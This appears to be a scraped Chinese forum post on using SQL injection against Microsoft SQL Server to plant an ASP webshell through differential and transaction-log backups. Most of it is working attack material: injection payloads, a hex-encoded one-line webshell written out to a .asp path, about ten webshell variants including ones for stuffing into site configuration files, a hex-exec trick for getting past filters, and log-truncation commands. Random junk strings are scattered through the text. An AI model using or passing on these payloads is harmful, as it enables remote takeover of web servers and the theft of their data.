MSsql差异备份总结

admin

差异备份的流程大概这样：
7 s, V: M3 ]& `' a" D1.完整备份一次(保存位置当然可以改)
5 d! F/ K: E; l% ^6 ~- kbackup database 库名 to disk = 'c:\ddd.bak';--
4 _; j% ?3 X: x9 A
2 @. }# o2 A9 f$ D& j4 i  d' u2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
: W. t7 ?1 L9 B7 B6 U3 _- j4 xinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
4 G* d6 A& |4 q5 C; }% X* b
' K% J. w( `  A0 j! f: l3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

" a" {4 Y% ~4 b  K) n! B如下是网上常见的差异备份代码，思路一样！
  f) G2 L8 y2 P, v9 G) @; J4 z===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
! I5 P3 c& M4 H( x4 @; S
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
' y; b, V  d  }& A% _7 L
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。
3 `% r' M6 i+ R/ i; [( T
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
2 x5 `: L3 H3 E. d# w" Z% t& Y===============================================================

我发现上面代码，有时会无效，而直接用
* b  X; @5 Q9 M( {# A
backup database 库名 to disk = 'c:\ddd.bak'
" g* d* [+ |6 l4 \
create table [dbo].[dtest] ([cmd] [image]);
  l& c7 g3 [3 Q
1 e: }; Y5 _0 `2 M) k( C+ [insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

6 M$ e( d0 r$ T. y* t/ zbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
2 ^- H$ O! |6 W; x7 U
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
3 M$ N( ]9 G6 V) g5 |+ x- X& S
网上还有log增量备份的，我也把他记录一下
=====================================================
+ {/ p2 R, b6 A- ^5 D# F另一种log增量备份技术:
- q  |7 U' k/ @' M
* \+ v: C) f( O* w- h. s" j% z';alter database null set RECOVERY FULL--

4 Y! t7 g7 Y( I: @6 w  X& e';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
' _: c5 ?! M, D+ h2 x! e# K* [8 G
$ q* y1 h( j  q* ~: f- t';backup log null to disk = '备份路径'--

' o8 Q/ m, v5 d% z6 n; ^2 ~';drop table cmd--
9 a, n$ q- M& s/ ~& B$ F
';alter database XXX set RECOVERY SIMPLE--

: G: }' Y* m" S' j% J- ^PS:0x3C2565786563757465287265717565737428226122292
  m' Z4 F- o  t) t' P) M9253EDA 是一句话小马16进制转来的
7 g+ Q! e! H9 s* Y9 Z1 `" H6 |
; H$ C) x  Y5 k+ M说到一句话马，还可以有这么几种写法：
$ L) F: n  b8 ^2 B! W
* g* J4 t8 m; `% Ea)<%%25Execute(request("a"))%%25>
# u* N5 ]! J$ h) W4 q$ Db)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
9 x1 Y  M+ P- V2 Q% u3 p4 u: [4 a. J* Td)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
% C+ H4 S" J# b& F3 Z& dg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
1 B+ ^. A; i) n2 j8 e8 kI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
( _4 h7 Y3 Y" z
=============================================

7 e* M3 f0 p* L7 }# Z6 @当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
5 L- d0 c( @- P3 V# B7 y& u1 i
把要执行的语句转16进制然后用exec执行
) D. Q7 f5 n& ^- t, Z$ m* m

减少备份文件大小方法如下:

) ]" ]+ ]' K; P) ^* `总的来说就是那么简单几句,下面以备份数据库model为例子
/ k9 j5 A( z; L( Y' H7 f1
& D4 h) I$ ~. l6 C/ `0 K5 Aid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--

4 [8 D5 Q# f0 G. w+ l. z  h
: ^0 A+ I6 [3 g  p1 i( m
: G" o7 e  Q$ B8 J) m2 k2 _- ySQL语句清理日志
1 O+ M& m1 u7 c2 b4 S) O* f注：test为数据库名
4 c8 m& ~7 [. {2 M4 v
--清空日志
DUMP TRANSACTION test WITH NO_LOG

8 H- \0 R) I! i: Q) I--截断事务日志
BACKUP LOG test WITH NO_LOG
/ F5 a! ?- W3 c: U& W
) {& N  n0 ?# l  u4 i: m--收缩数据库
DBCC SHRINKDATABASE(test)
5 T# z) E1 `) u. ]- Y. q
7 _8 S7 r% F3 J% D% m--收缩指定数据文件,1是文件号,可以通过这个语句查询到
. g3 u4 J' U( i' J% \  x  Y' u2 LSelect * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
8 `$ G5 J  H  b9 O  bEXEC sp_dboption 'test', 'autoshrink', 'TRUE'